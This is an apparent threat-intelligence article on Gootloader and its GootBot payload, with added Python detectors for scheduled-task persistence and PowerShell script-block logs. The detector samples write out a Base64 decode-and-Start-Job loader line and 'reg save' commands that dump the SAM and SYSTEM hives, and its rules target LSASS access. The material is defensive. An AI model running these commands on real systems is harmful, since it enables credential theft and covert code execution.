Gootloader itself is written in JavaScript and is distributed via black hat SEO (BHSEO) campaigns that involve using compromised websites to inject rogue results into search engines. Gootloader search result poisoning campaigns typically target keywords for business documents specific to different industries.
“Hive0127 typically targets online searches for contracts, legal forms or other business-related documents; for example: ‘Is a closing statement the same as a grand contract?’,” researchers from X-Force explain. “Targets are served a compromised website modified to appear as a legitimate forum at the top of the poisoned search engine results page. Within the forum conversation, the targets are then tricked into downloading an archive file related to their initial search terms, but which actually contains Gootloader.”
From Gootloader to GootBot
Upon execution, Gootloader drops a malicious JavaScript file in an existing folder under the %APPDATA% directory and sets up a scheduled task to ensure its persistent execution at restart. The JavaScript file then executes a PowerShell script that collects basic information about the system and uploads it to 10 hard-coded URLs, usually compromised WordPress websites. The script also searches in a loop for additional PowerShell payloads to download and execute from these servers.
In past campaigns, this is the stage where attackers deployed Cobalt Strike or other more advanced payloads. However, the X-Force researchers recently observed a new payload in the form of an obfuscated PowerShell script that reaches out to a single C2 server and waits for additional tasks to execute. They named this payload GootBot because it is a more lightweight variant of Gootloader itself.
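The persistence step described above (a dropped .js file under %APPDATA% launched by a scheduled task) is something a defender can hunt for by inspecting exported Task Scheduler XML definitions. The following Python script is an added example and is not code from the article or from the X-Force report; the two task definitions are constructed for illustration, and the assumption that the task launches the script through wscript.exe or cscript.exe is mine (the article does not name the launcher). The check flags only tasks that combine a boot or logon trigger, a script host, a .js argument and a roaming %APPDATA% path, which keeps ordinary vendor updaters out of the results.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by Windows Task Scheduler XML exports (schtasks /query /xml).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumption: a dropped .js file would be started via one of the Windows script hosts.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
APPDATA_RE = re.compile(r"(%APPDATA%|\\AppData\\Roaming\\)", re.IGNORECASE)
JS_RE = re.compile(r"\.js\b", re.IGNORECASE)

# Constructed sample: a task that mirrors the persistence pattern described in the article.
SUSPICIOUS_TASK = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>wscript.exe</Command>
      <Arguments>"%APPDATA%\ExampleVendor\update.js"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed sample: a benign updater with the same trigger but no script host or .js file.
BENIGN_TASK = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\ExampleVendor\updater.exe</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>"""


def analyse_task(xml_text):
    """Return the command lines of Exec actions that match the %APPDATA% .js persistence pattern."""
    root = ET.fromstring(xml_text.strip())
    findings = []
    # Persistence across restarts or logons is required for a hit.
    persistent = any(
        root.find(f"t:Triggers/t:{tag}", NS) is not None
        for tag in ("BootTrigger", "LogonTrigger")
    )
    for exec_action in root.findall("t:Actions/t:Exec", NS):
        cmd = exec_action.findtext("t:Command", default="", namespaces=NS).strip()
        args = exec_action.findtext("t:Arguments", default="", namespaces=NS).strip()
        line = f"{cmd} {args}".strip()
        host_is_script_engine = cmd.lower().rsplit("\\", 1)[-1] in SCRIPT_HOSTS
        if persistent and host_is_script_engine and JS_RE.search(line) and APPDATA_RE.search(line):
            findings.append(line)
    return findings


if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(name, analyse_task(xml_text))
```

On a live host the same function can be fed the output of `schtasks /query /xml` for each task; the heuristic is intentionally narrow and should be treated as a triage filter rather than a verdict.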
“As a response, GootBot expects a string consisting of a Base64-encoded payload, with the last eight characters being the task name,” the researchers said. “It then decodes the payload and injects it into a simple scriptblock before executing it in a new background job using the ‘Start-Job’ Cmdlet. This allows the PowerShell payload to be run asynchronously and without creating a child process, potentially resulting in fewer EDR detections.”
What makes GootBot different is that it is not only deployed on the system where Gootloader was first executed, but also on other systems from the same network. The payloads that GootBot receives are PowerShell scripts used for lateral movement that enumerate network systems and the domain and exfiltrate credentials by dumping the memory of the LSASS process, as well as registry hives such as SAM, SYSTEM, and SECURITY.
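Because GootBot runs its tasks inside the existing PowerShell process via Start-Job rather than spawning a child process, process-creation telemetry is a weak signal; the script block itself is still recorded when PowerShell Script Block Logging (Event ID 4104) is enabled. The Python detector below is an added example, not code from the article or from X-Force, and it applies simple co-occurrence rules to constructed sample ScriptBlockText records that mirror the behaviours described in the two paragraphs above: Base64 decoding followed by Start-Job, scriptblock construction from a string, and registry hive saves or LSASS references from the lateral-movement stage. The rule names and patterns are my own assumptions about what a defender would look for.

```python
import re

# Constructed sample Event ID 4104 ScriptBlockText records (not real captured logs).
SAMPLE_EVENTS = [
    {"id": 1, "text": "Start-Job -ScriptBlock { Get-ChildItem C:\\logs -Filter *.log }"},
    {"id": 2, "text": "$r = (Invoke-WebRequest $u).Content; "
                      "$t = $r.Substring($r.Length - 8); "
                      "$b = [Convert]::FromBase64String($r.Substring(0, $r.Length - 8)); "
                      "$sb = [scriptblock]::Create([Text.Encoding]::UTF8.GetString($b)); "
                      "Start-Job -Name $t -ScriptBlock $sb"},
    {"id": 3, "text": "reg save HKLM\\SAM $env:TEMP\\sam.hiv; reg save HKLM\\SYSTEM $env:TEMP\\sys.hiv"},
    {"id": 4, "text": "Get-Content $env:SystemRoot\\system32\\drivers\\etc\\hosts"},
    {"id": 5, "text": "Get-Process -Name lsass | Select-Object Id, WorkingSet"},
]

# Each rule fires only when every pattern in its list is present in the same script block.
# Assumed heuristics, chosen to reflect the behaviour described in the article.
RULES = {
    "decode-and-start-job": [r"FromBase64String", r"\bStart-Job\b"],
    "scriptblock-from-string": [r"\[scriptblock\]::Create\("],
    "registry-hive-save": [r"\breg(\.exe)?\s+save\b", r"HKLM\\(SAM|SYSTEM|SECURITY)\b"],
    "lsass-reference": [r"\blsass\b"],
}

COMPILED = {name: [re.compile(p, re.IGNORECASE) for p in pats] for name, pats in RULES.items()}


def match_rules(text):
    """Return the names of all rules whose patterns all occur in the script block text."""
    return [name for name, pats in COMPILED.items() if all(p.search(text) for p in pats)]


def evaluate(events):
    """Return (event id, matched rule names) for every event that triggers at least one rule."""
    hits = []
    for event in events:
        rules = match_rules(event["text"])
        if rules:
            hits.append((event["id"], rules))
    return hits


if __name__ == "__main__":
    for event_id, rules in evaluate(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(rules)}")
```

Event 1 shows why the first rule pairs Start-Job with a Base64 decode: background jobs on their own are routine administration, so the decode-then-execute combination is the part worth alerting on. The lsass-reference rule is deliberately loose and will also match benign process listings such as event 5; it is a triage hint to be correlated with the other rules, not a standalone alert.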